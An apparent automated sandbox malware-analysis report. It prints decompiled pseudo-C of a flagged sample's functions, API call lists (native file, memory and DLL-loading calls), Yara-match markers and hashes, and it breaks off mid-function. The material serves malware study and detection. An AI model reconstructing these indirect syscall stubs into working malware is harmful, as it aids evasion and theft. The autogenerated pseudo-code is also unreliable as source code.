                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-1669384263
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E704810E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                          				char* _t17;
                                                                                                                          				char _t19;
                                                                                                                          				void* _t20;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t27;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t37;
                                                                                                                          				void* _t39;
                                                                                                                          				void* _t40;
                                                                                                                          				signed int _t43;
                                                                                                                          				void* _t52;
                                                                                                                          				char* _t53;
                                                                                                                          				char* _t55;
                                                                                                                          				void* _t56;
                                                                                                                          				void* _t58;
                                                                                                                          
                                                                                                                          				 *0x7048405c = _a8;
                                                                                                                          				 *0x70484060 = _a16;
                                                                                                                          				 *0x70484064 = _a12;
                                                                                                                          				 *((intOrPtr*)(_a20 + 0xc))( *0x70484038, E70481556, _t52);
                                                                                                                          				_t43 =  *0x7048405c +  *0x7048405c * 4 << 2;
                                                                                                                          				_t17 = E7048123B();
                                                                                                                          				_a8 = _t17;
                                                                                                                          				_t53 = _t17;
                                                                                                                          				if( *_t17 == 0) {
                                                                                                                          					L16:
                                                                                                                          					return GlobalFree(_a8);
                                                                                                                          				} else {
                                                                                                                          					do {
                                                                                                                          						_t19 =  *_t53;
                                                                                                                          						_t55 = _t53 + 1;
                                                                                                                          						_t58 = _t19 - 0x6c;
                                                                                                                          						if(_t58 > 0) {
                                                                                                                          							_t20 = _t19 - 0x70;
                                                                                                                          							if(_t20 == 0) {
                                                                                                                          								L12:
                                                                                                                          								_t53 = _t55 + 1;
                                                                                                                          								_t24 = E70481266(E704812AD( *_t55 - 0x30));
                                                                                                                          								L13:
                                                                                                                          								GlobalFree(_t24);
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							_t27 = _t20;
                                                                                                                          							if(_t27 == 0) {
                                                                                                                          								L10:
                                                                                                                          								_t53 = _t55 + 1;
                                                                                                                          								_t24 = E704812D1( *_t55 - 0x30, E7048123B());
                                                                                                                          								goto L13;
                                                                                                                          							}
                                                                                                                          							L7:
                                                                                                                          							if(_t27 == 1) {
                                                                                                                          								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                                                                                          								 *_t31 =  *0x70484030;
                                                                                                                          								 *0x70484030 = _t31;
                                                                                                                          								E70481508(_t31 + 4,  *0x70484064, _t43);
                                                                                                                          								_t56 = _t56 + 0xc;
                                                                                                                          							}
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						if(_t58 == 0) {
                                                                                                                          							L17:
                                                                                                                          							_t34 =  *0x70484030;
                                                                                                                          							if( *0x70484030 != 0) {
                                                                                                                          								E70481508( *0x70484064, _t34 + 4, _t43);
                                                                                                                          								_t37 =  *0x70484030;
                                                                                                                          								_t56 = _t56 + 0xc;
                                                                                                                          								GlobalFree(_t37);
                                                                                                                          								 *0x70484030 =  *_t37;
                                                                                                                          							}
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          						_t39 = _t19 - 0x4c;
                                                                                                                          						if(_t39 == 0) {
                                                                                                                          							goto L17;
                                                                                                                          						}
                                                                                                                          						_t40 = _t39 - 4;
                                                                                                                          						if(_t40 == 0) {
                                                                                                                          							 *_t55 =  *_t55 + 0xa;
                                                                                                                          							goto L12;
                                                                                                                          						}
                                                                                                                          						_t27 = _t40;
                                                                                                                          						if(_t27 == 0) {
                                                                                                                          							 *_t55 =  *_t55 + 0xa;
                                                                                                                          							goto L10;
                                                                                                                          						}
                                                                                                                          						goto L7;
                                                                                                                          						L14:
                                                                                                                          					} while ( *_t53 != 0);
                                                                                                                          					goto L16;
                                                                                                                          				}
                                                                                                                          			}



















                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1780285237-0
                                                                                                                          • Opcode ID: 4971420ee33835e7b2a94fccd3a2673fe79ff6c225ae40302eba5e7345b059a2
                                                                                                                          • Instruction ID: 58957b3c8fd60a6619ae401740a5705dd9c61fd0bf2c2153308f9319eb758a4c
                                                                                                                          • Opcode Fuzzy Hash: 4971420ee33835e7b2a94fccd3a2673fe79ff6c225ae40302eba5e7345b059a2
                                                                                                                          • Instruction Fuzzy Hash: 643181B2504244AFD7019F69DD49B2E7FFCEB4A244F240D6FEA46D63F4DA7898018B11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                          				int _v8;
                                                                                                                          				int _t12;
                                                                                                                          				int _t14;
                                                                                                                          				int _t15;
                                                                                                                          				CHAR* _t17;
                                                                                                                          				CHAR* _t27;
                                                                                                                          
                                                                                                                          				_t12 = lstrlenA(_a8);
                                                                                                                          				_t27 = _a4;
                                                                                                                          				_v8 = _t12;
                                                                                                                          				while(lstrlenA(_t27) >= _v8) {
                                                                                                                          					_t14 = _v8;
                                                                                                                          					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                          					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                          					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                          					if(_t15 == 0) {
                                                                                                                          						_t17 = _t27;
                                                                                                                          					} else {
                                                                                                                          						_t27 = CharNextA(_t27);
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					L5:
                                                                                                                          					return _t17;
                                                                                                                          				}
                                                                                                                          				_t17 = 0;
                                                                                                                          				goto L5;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                          • Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
                                                                                                                          • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                                                                          • Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                          				void* _t18;
                                                                                                                          				void* _t27;
                                                                                                                          				intOrPtr* _t28;
                                                                                                                          
                                                                                                                          				_t13 = _a4;
                                                                                                                          				_t28 = _a4 + 0xc48;
                                                                                                                          				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                          				_t6 =  &_a32; // 0x413d42
                                                                                                                          				_t12 =  &_a8; // 0x413d42
                                                                                                                          				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                          				return _t18;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: B=A$B=A
                                                                                                                          • API String ID: 2738559852-2767357659
                                                                                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                          • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: B=A$B=A
                                                                                                                          • API String ID: 2738559852-2767357659
                                                                                                                          • Opcode ID: e1268d1d13aa14866ec5fc9901a730ad66f9bcd5069cb30f9be6d9970bbefc6c
                                                                                                                          • Instruction ID: 1484faaf3d123641ce807f159fcb9d865f870cdb077d6852328bcb0df488e4e3
                                                                                                                          • Opcode Fuzzy Hash: e1268d1d13aa14866ec5fc9901a730ad66f9bcd5069cb30f9be6d9970bbefc6c
                                                                                                                          • Instruction Fuzzy Hash: E5F01DB6210144AFCB04DFA9D880CEB7BADBF8D218B15835DFE5C97252C630E855CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                          				char* _v8;
                                                                                                                          				struct _EXCEPTION_RECORD _v12;
                                                                                                                          				struct _OBJDIR_INFORMATION _v16;
                                                                                                                          				char _v536;
                                                                                                                          				void* _t15;
                                                                                                                          				struct _OBJDIR_INFORMATION _t17;
                                                                                                                          				struct _OBJDIR_INFORMATION _t18;
                                                                                                                          				void* _t30;
                                                                                                                          				void* _t31;
                                                                                                                          				void* _t32;
                                                                                                                          
                                                                                                                          				_v8 =  &_v536;
                                                                                                                          				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                                                                          				_t31 = _t30 + 0xc;
                                                                                                                          				if(_t15 != 0) {
                                                                                                                          					_t17 = E0041AF60(__eflags, _v8);
                                                                                                                          					_t32 = _t31 + 4;
                                                                                                                          					__eflags = _t17;
                                                                                                                          					if(_t17 != 0) {
                                                                                                                          						E0041B1E0( &_v12, 0);
                                                                                                                          						_t32 = _t32 + 8;
                                                                                                                          					}
                                                                                                                          					_t18 = E004192F0(_v8);
                                                                                                                          					_v16 = _t18;
                                                                                                                          					__eflags = _t18;
                                                                                                                          					if(_t18 == 0) {
                                                                                                                          						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                          						return _v16;
                                                                                                                          					}
                                                                                                                          					return _t18;
                                                                                                                          				} else {
                                                                                                                          					return _t15;
                                                                                                                          				}
                                                                                                                          			}














                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                          • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E004181AA(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                          				long _t21;
                                                                                                                          				void* _t31;
                                                                                                                          
                                                                                                                          				asm("cmc");
                                                                                                                          				 *0x55e8dfb4 =  *0x55e8dfb4 + 0x8b;
                                                                                                                          				_t15 = _a4;
                                                                                                                          				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                          				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                          				return _t21;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 5329f2889c0faf2d7b06cba2bc1cfff50958c0534a6a266dcddd042ab4cdd5dd
                                                                                                                          • Instruction ID: b3099a9442be8ac3c311f73c3061f49903642779ba4c4215955791e8b671904c
                                                                                                                          • Opcode Fuzzy Hash: 5329f2889c0faf2d7b06cba2bc1cfff50958c0534a6a266dcddd042ab4cdd5dd
                                                                                                                          • Instruction Fuzzy Hash: F701C9B2215108AFCB48CF98DC95DEB77A9AF8C354F15824CFA5DD7291C630E851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                          				long _t21;
                                                                                                                          				void* _t31;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                          				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                          				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                          				return _t21;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                          • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                          				long _t14;
                                                                                                                          				void* _t21;
                                                                                                                          
                                                                                                                          				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                          				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                          				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                          				return _t14;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                          • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E004182DA(void* __ebx, intOrPtr _a4, void* _a8) {
                                                                                                                          				long _t8;
                                                                                                                          				void* _t13;
                                                                                                                          
                                                                                                                          				asm("adc [ebx+0x556fefef], esp");
                                                                                                                          				_t5 = _a4;
                                                                                                                          				_t2 = _t5 + 0x10; // 0x300
                                                                                                                          				_t3 = _t5 + 0xc50; // 0x409733
                                                                                                                          				E00418DB0(_t13, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                          				_t8 = NtClose(_a8); // executed
                                                                                                                          				return _t8;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 06248f8ea0de34a5af732b1c0ee2a8feef5fd12f18ba670cac1c28878d5babf3
                                                                                                                          • Instruction ID: 5f51529947ee7be49ce6f7e9e99f00dbcfd4cf5c0cbd7c544e2ac80e8fbb4815
                                                                                                                          • Opcode Fuzzy Hash: 06248f8ea0de34a5af732b1c0ee2a8feef5fd12f18ba670cac1c28878d5babf3
                                                                                                                          • Instruction Fuzzy Hash: 59E08C32600314ABDB10EF98CC85ED73B68EF48720F04419EBE085B242C530F91086D0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004182E0(intOrPtr _a4, void* _a8) {
                                                                                                                          				long _t8;
                                                                                                                          				void* _t11;
                                                                                                                          
                                                                                                                          				_t5 = _a4;
                                                                                                                          				_t2 = _t5 + 0x10; // 0x300
                                                                                                                          				_t3 = _t5 + 0xc50; // 0x409733
                                                                                                                          				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                                                                          				_t8 = NtClose(_a8); // executed
                                                                                                                          				return _t8;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265940310.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 29%
                                                                                                                          			E004184B3(void* __eax, void* __ebx, void* __ecx, char _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				long _t12;
                                                                                                                          				intOrPtr* _t16;
